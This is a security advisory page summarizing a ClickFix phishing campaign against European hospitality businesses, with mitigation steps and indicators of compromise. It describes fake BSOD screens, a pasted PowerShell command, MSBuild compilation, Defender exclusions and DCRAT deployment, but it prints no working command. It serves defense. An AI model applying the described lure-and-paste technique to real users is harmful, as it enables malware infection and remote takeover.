top of page
perceptive_background_267k.jpg

ClickFix attack uses fake Windows BSOD screens to push malware

Published:

5 januari 2026 om 21:16:35

Alert date:

5 januari 2026 om 22:02:21

Source:

bleepingcomputer.com

Click to open the original link from this advisory

Operating Systems, Ransomware & Malware, Email & Messaging

A new ClickFix social engineering campaign is targeting the hospitality sector in Europe, using fake Windows Blue Screen of Death (BSOD) screens to trick users into manually compiling and executing malware on their systems. The attack leverages convincing fake error screens to manipulate victims into following malicious instructions. This represents an evolution of social engineering tactics, moving beyond traditional phishing to more sophisticated visual deception techniques. The campaign specifically targets hospitality businesses, suggesting a focused approach by the attackers. The use of fake BSOD screens makes this attack particularly dangerous as users may believe they are following legitimate system recovery procedures.

Technical details

ClickFix social engineering campaign targeting hospitality sector in Europe using fake Windows Blue Screen of Death (BSOD) screens. Attack begins with phishing emails impersonating Booking.com reservation cancellations, leading victims to fake website (low-house[.]com). Malicious JavaScript displays fake loading error, then triggers full-screen fake BSOD that instructs users to open Windows Run dialog and press CTRL+V to paste malicious PowerShell command. Command downloads and compiles malicious .NET project using legitimate MSBuild.exe, adds Windows Defender exclusions, establishes persistence via Startup folder, and deploys DCRAT remote access Trojan. Malware is injected into aspnet_compiler.exe process using process hollowing and supports remote desktop, keylogging, reverse shell, and cryptocurrency mining capabilities.

Mitigation steps:

Train staff to recognize legitimate BSOD screens (which do not offer recovery instructions and only display error codes), implement email security controls to detect phishing attempts impersonating booking platforms, monitor for suspicious PowerShell execution and MSBuild.exe usage, watch for unexpected Windows Defender exclusion additions, monitor BITS usage for suspicious downloads, check Startup folder for unauthorized .url files, and implement process monitoring to detect process hollowing attacks against legitimate executables like aspnet_compiler.exe.

Affected products:

Windows operating system
Windows Defender
MSBuild.exe
aspnet_compiler.exe
Booking.com (impersonated)

Related links:

https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/

Related CVE's:

Related threat actors:

IOC's:

low-house[.]com, staxs.exe, DCRAT remote access Trojan, Malicious .NET project (v.proj), Fake BSOD screens in browser full-screen mode, PowerShell commands copying to clipboard, Background Intelligent Transfer Service (BITS) usage, .url files in Startup folder

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Deze website toont informatie afkomstig van externe bronnen; Perceptive aanvaardt geen verantwoordelijkheid voor de juistheid, volledigheid of actualiteit van deze informatie.

bottom of page